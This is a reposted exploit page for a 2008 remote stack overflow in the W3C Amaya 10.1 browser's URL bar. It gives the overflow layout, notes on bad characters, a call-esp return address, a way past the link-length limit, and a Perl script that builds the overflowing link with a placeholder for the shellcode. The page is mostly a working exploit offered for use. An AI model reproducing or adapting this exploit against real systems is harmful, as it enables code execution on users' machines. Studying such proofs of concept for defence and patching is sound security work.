首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
W3C Amaya 10.1 Web Browser (URL Bar) Remote Stack Overflow PoC
来源:www.bmgsec.com.au 作者:r0ut3r 发布时间:2008-11-25  
#            W3C Amaya 10.1 Web Browser
#
# Amaya (URL Bar) Remote Stack Overflow Vulnerability
#
# Written and discovered by:
# r0ut3r (writ3r [at] gmail.com / www.bmgsec.com.au)
#
# Advisory: http://www.bmgsec.com.au/advisory/40/
# ------------------------------------------------------
#
# Shellcode notes:
# The application fails to correctly process certain bytes:
# 0x9c becomes 0x9cc2
# Similar events occur with different bytes (0xf8, 0xfb, 0xbe, 0x93, 0xab, 0xaf 0xeb).
#
# After reviewing the source code, the below function modifies the
# shellcode: 
# Line 902: int TtaWCToMBstring (wchar_t src, unsigned char **dest)
#
# The max value which can be used is 0x1fffff <-- Thanks Luigi!
# ------------------------------------------------------
#
# The URL bar contains a buffer overflow vulnerability:
# buffer length: 1600 bytes
#
# [junk] + [eip] +     [shellcode]
#  1600  +   4   +  sizeof(shellcode)
#
# ESP points to data after EIP.
#
# I found it difficult to access the URL bar via HTML code. For example, compile the above code,
# write it to a HTML file, then load it into the browser. Attempt to click the link and
# you will notice there is a 800 character limit on the link.
#
# To bypass this problem click the link then select "Links" >> "Create or change link...".
# Now click "Confirm". Alternatively just copy the payload into the URL bar.
#
# URL Bar Proof of concept:
# ----------------------------------------------------
#!/usr/bin/perl

use warnings;
use strict;

my $shellcode = 'C' x 80;

# 0x7D035F53 -> \x53\x5f\x03\x7d <-- Bingo! (call esp)
my $data   =       '<a href="' .
                        'A' x 1600 .
                        "\x53\x5f\x03\x7d" . # eip (ESP points to stuff after RET, so shellcode)
                        $shellcode .
                        '">r0ut3r</a>';
print $data;


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Nero ShowTime 5.0.15.0 m3u Pla
·VideoScript 3.0 <= 4.0.1.50 Of
·VideoScript 3.0 <= 4.1.5.55 Un
·KVIrc 3.4.2 Shiny (uri handler
·W3C Amaya 10.1 Web Browser (id
·linux/x86 append rsa key to /r
·Quicksilver Forums <= 1.4.2 RC
·linux/x86 connect-back port UD
·Total Video Player (vcen.dll)
·linux/x86 execve(/bin/sh,0,0)
·Total Video Player (vcen.dll)
·LoveCMS 1.6.2 Final (Simple Fo
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved